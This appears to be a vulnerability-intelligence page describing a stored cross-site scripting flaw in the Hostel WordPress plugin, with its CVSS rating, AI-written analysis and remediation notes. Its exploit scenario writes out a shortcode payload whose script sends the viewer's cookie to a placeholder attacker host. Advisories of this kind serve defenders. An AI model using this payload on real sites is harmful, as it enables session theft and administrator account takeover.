Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
PR:L confirmed by required Contributor account; UI:R applied because a victim must visit the injected page to trigger payload execution; S:C reflects cross-browser scope change inherent to stored XSS.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The Hostel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wphostel-book' shortcode in all versions up to and including 1.1.7. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes. Specifically, the second shortcode attribute (used as button text) is passed to the $text variable without sanitization at line 79 and then output directly into an HTML value attribute at line 91 without esc_attr() or any other escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AnalysisAI
Stored Cross-Site Scripting in the Hostel WordPress plugin (all versions through 1.1.7) permits authenticated Contributor-level users to permanently inject arbitrary JavaScript into WordPress pages via the second attribute of the wphostel-book shortcode, which is passed unsanitized to the $text variable and rendered raw into an HTML value attribute without esc_attr() escaping. Any user who subsequently views an injected page will execute the attacker's payload in their browser, enabling session hijacking or privilege escalation against higher-privileged site users. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation strictly requires an authenticated user account with Contributor-level WordPress role or higher - unauthenticated exploitation is not possible, as confirmed by the PR:L CVSS metric. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 score of 6.4 (Medium) reflects the real-world nuance well: the network vector (AV:N) and low complexity (AC:L) confirm the exploit requires no unusual conditions once the attacker has access, but the Low Privilege requirement (PR:L) is the critical limiting factor - the attacker must hold at minimum a Contributor-level WordPress account. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who has registered or compromised a Contributor-level account on the target WordPress site creates a new post and inserts `[wphostel-book "" "<script>document.location='https://attacker.tld/?c='+document.cookie</script>"]` as the shortcode, publishing it or saving it as a draft. When a site administrator reviews or approves the post, their browser executes the injected script, delivering their session cookie to the attacker and enabling full administrative account takeover. … |
| Remediation | A fix commit has been pushed to the Hostel plugin trunk in the WordPress plugin repository, as indicated by the changeset reference at https://plugins.trac.wordpress.org/changeset?reponame=&old=3480942%40hostel&new=3480942%40hostel; however, no specific patched release version number (e.g., 1.1.8 or later) is independently confirmed from the available data - site administrators should update to the latest available version via the WordPress admin dashboard and verify the installed version exceeds 1.1.7. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
The Hostel WordPress plugin before 1.1.5.8 does not sanitise and escape a parameter before outputting it back in the pag
The Hostel WordPress plugin before 1.1.5.3 does not sanitise and escape a parameter before outputting it back in the pag
The Hostel WordPress plugin before 1.1.5.9 does not sanitise and escape some of its settings, which could allow high pri
The Hostel WordPress plugin before 1.1.5.2 does not sanitise and escape some of its settings, which could allow high pri
XSS exists in the Kiboko Hostel plugin before 1.1.4 for WordPress. Rated medium severity (CVSS 6.1), this vulnerability
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-42842
GHSA-9hmh-43jg-fm2x